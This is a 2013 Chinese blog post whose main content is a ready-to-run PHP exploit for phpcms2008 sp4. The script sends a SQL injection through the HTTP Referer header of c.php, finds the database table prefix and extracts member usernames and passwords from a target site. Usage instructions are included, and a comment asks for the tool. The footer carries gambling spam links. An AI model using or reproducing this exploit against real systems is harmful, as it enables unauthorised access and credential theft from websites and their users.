Mar 28 2013

phpcms2008 最新注入 exp

首页 » 原创作品 » phpcms2008 最新注入 exp   

春雨绵绵 无心睡眠 唔阅周章 五指一算 唔命不久矣。

        十年苦读寒窗,终究成何物。

文采不行。该学习吹bb看论语才行。。。。。。。。。。。。。。

                    囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

<?php

print_r ( "
+---------------------------------------+
title:phpcms2008 sp4 c.php exploit
mail:40497992@qq.com
blog:www.moonhack.org
bbs:www.xinyues.org
data:2013.3.28	
+---------------------------------------+\n
" );
if ($argc < 2) {
print_r ( "
+---------------------------------------+
target:
php $argv[0] www.target.com 
php $argv[0] www.target.com /phpcms2008/
+---------------------------------------+\n
" );
exit ();
}
error_reporting ( E_ALL );
ini_set ( 'max_execution_time', '0' );
function send_http($host, $prot, $referer) {
	$data = "";
	$fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );
	if (! $fp) {
		exit ( "$host Connection failed" );
	} else {
		
		fwrite ( $fp, $referer );
		while ( ! feof ( $fp ) ) {
			$data .= fgets ( $fp, 128 );
		}
		fclose ( $fp );
		return $data;
	}

}
$host = $argv [1];
$prot = "80";
$patch = isset ( $argv [2] ) ? $argv [2] : "";
$sql = "fuck'";

$prefix = http ( $host, $prot, $sql, $patch );
function http($host, $prot, $sql, $patch) {
	$preg = '/INSERT INTO `(.*)ads_/';
	$prefix = '';
	$referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
	$referer .= "Host: $host\r\n";
	$referer .= "REFERER: $sql\r\n";
	$referer .= "Connection: Close\r\n\r\n";
	$data = send_http ( $host, $prot, $referer );
	$data ;
	preg_match ( $preg, $data, $prefix );
	if (! $prefix) {
	exit ( "fail\r\n" );
	}
	print ("prefix:$prefix[1]") ;
	return $prefix [1];
}

$exp = http2 ( $host, $prot, $patch, $prefix );
function http2($host, $prot, $patch, $prefix) {
	$preg = '/\'~\'(.*):(.*)\'~1\'/';
	$sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";
	$referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
	$referer .= "Host: $host\r\n";
	$referer .= "REFERER: $sql2\r\n";
	$referer .= "Connection: Close\r\n\r\n";
	$data = send_http ( $host, $prot, $referer );
	preg_match ( $preg, $data, $exp );
	if (! $exp) {
		exit ( "fail\r\n" );
	}
	return $exp;
}
print_r ( "
success:$host
username:$exp[1]
password:$exp[2]
" );
?>
点击查看原图

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: phpcms2008漏洞 phpcms2008exp

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «mysql绕过注入过滤(你看的懂的英文版) | REMOTE_ADDR注射的可行性»

你肿么看?

你还可以输入 250/250 个字

微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

已有1条评论

雪花

2013-07-16 17:06 沙发
求工具呵呵呵 暗月大牛245452134@qq.com 博客友情链接 [4]  [1]  [1]  [1]  [1]
友情链接:万达娱乐注册  万达娱乐开户  万达主管  万达招商QQ  万达娱乐主管  万达娱乐直属QQ  万达娱乐开户  万达招商  万达娱乐招商  万达娱乐登录